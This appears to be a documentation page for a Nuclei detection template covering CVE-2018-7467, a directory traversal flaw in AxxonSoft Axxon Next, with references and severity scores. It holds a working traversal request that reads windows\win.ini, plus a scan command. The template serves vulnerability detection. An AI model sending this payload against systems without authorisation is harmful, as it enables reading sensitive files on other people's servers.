AxxonSoft Axxon Next - Local File Inclusion
ID: CVE-2018-7467
Severity: high
Author: 0x_Akoko
Tags: cve,cve2018,axxonsoft,lfi,packetstorm
Description
Section titled “Description”AxxonSoft Axxon Next suffers from a local file inclusion vulnerability.
YAML Source
Section titled “YAML Source”id: CVE-2018-7467
info: name: AxxonSoft Axxon Next - Local File Inclusion author: 0x_Akoko severity: high description: AxxonSoft Axxon Next suffers from a local file inclusion vulnerability. impact: | An attacker can read sensitive files, execute arbitrary code, or launch further attacks. remediation: | Apply the latest security patches or updates provided by AxxonSoft to fix the local file inclusion vulnerability. reference: - https://packetstormsecurity.com/files/146604/AxxonSoft-Axxon-Next-Directory-Traversal.html - https://github.com/sullo/advisory-archives/blob/master/axxonsoft-next-CVE-2018-7467.txt - https://nvd.nist.gov/vuln/detail/CVE-2018-7467 - http://www.projectxit.com.au/blog/2018/2/27/axxonsoft-client-directory-traversal-cve-2018-7467-axxonsoft-axxon-next-axxonsoft-client-directory-traversal-via-an-initial-css2f-substring-in-a-uri-cve-2018-7467 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-7467 cwe-id: CWE-22 epss-score: 0.00396 epss-percentile: 0.73405 cpe: cpe:2.3:a:axxonsoft:next:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: axxonsoft product: next tags: cve,cve2018,axxonsoft,lfi,packetstorm
http: - raw: - |+ GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini HTTP/1.1 Host: {{Hostname}}
unsafe: true matchers: - type: word part: body words: - "bit app support" - "fonts" - "extensions" condition: and# digest: 4a0a004730450220492dd05b2bc6122378c10d49f6c4683768e76e30afa118044ca521bf09e905890221008dbf5a16a20c07ea8871ffa855b9300fe2e1bf751aecbb39552d54b29d860687:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-7467.yaml"